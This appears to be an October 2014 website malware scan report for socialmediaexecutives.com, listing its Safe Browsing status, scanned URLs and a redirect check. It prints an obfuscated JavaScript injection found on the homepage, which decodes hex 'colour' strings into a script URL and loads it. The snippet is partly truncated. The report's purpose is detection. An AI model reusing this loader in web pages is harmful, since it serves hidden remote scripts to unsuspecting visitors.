Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=socialmediaexecutives.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://socialmediaexecutives.com/ | 200 OK Content-Length: 5729 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e4745', '#3d4444', '#3d4043', '#3f3d41', '#3f423e', '#79823e', '#798084', '#748188', '#3d7c78', '#7d3d7f', '#777f31', '#4d0000'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) { var s = ""; for (j=0;j< document.write(div_pick_colors(div_colors,1)); } else { var new_cstyle=document.createElement("script"); new_cstyle.type="text/javascript"; new_cstyle.src=div_pick_colors(div_colors,0); document.getElementsByTagName("head")[0].appendChild(new_cstyle); } } catch(e) { } try { check_colors_picked(); } catch(e) { setTimeout("try_pick_colors()", 500); } } try_pick_colors(); } Antivirus reports:
| ||
http://server.iad.liveperson.net/hc/33645339/x.js?cmd=file&file=chatScript3&site=33645339&imageUrl=null | HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Oct 2014 23:00:32 GMT Location: /hcp/html/error_disable.html Server: Microsoft-IIS/6.0 Content-Length: 0 Expires: Wed, 31 Dec 1969 23:59:59 GMT P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" Set-Cookie: LivePersonID=LP i=121660444035380,d=1413154833; expires=Mon, 12-Oct-2015 23:00:33 GMT; path=/; domain=.liveperson.net X-Powered-By: ASP.NET | clean |
http://server.iad.liveperson.net/hcp/html/error_disable.html | HTTP/1.1 200 OK Date: Sun, 12 Oct 2014 23:00:33 GMT Accept-Ranges: bytes ETag: "c065ea88b691cc1:2368" Server: Microsoft-IIS/6.0 Content-Length: 687 Content-Location: http://server.iad.liveperson.net/hcp/html/error_disable.html Content-Type: text/html Last-Modified: Sun, 23 Oct 2011 19:04:05 GMT P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET | clean |
http://server.iad.liveperson.net/test404page.js | 500 Server closed connection without sending any data back Content-Length: 105 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: socialmediaexecutives.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 12 Oct 2014 23:00:33 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 5729
Content-Type: text/html
Last-Modified: Tue, 29 Mar 2011 20:34:40 GMT
...5729 bytes of data.
GET / HTTP/1.1
Host: socialmediaexecutives.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 12 Oct 2014 23:00:33 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 5729
Content-Type: text/html
Last-Modified: Tue, 29 Mar 2011 20:34:40 GMT
...5729 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: socialmediaexecutives.com
Referer: http://www.google.com/search?q=socialmediaexecutives.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: socialmediaexecutives.com
Referer: http://www.google.com/search?q=socialmediaexecutives.com
Result:
The result is similar to the first query. There are no suspicious redirects found.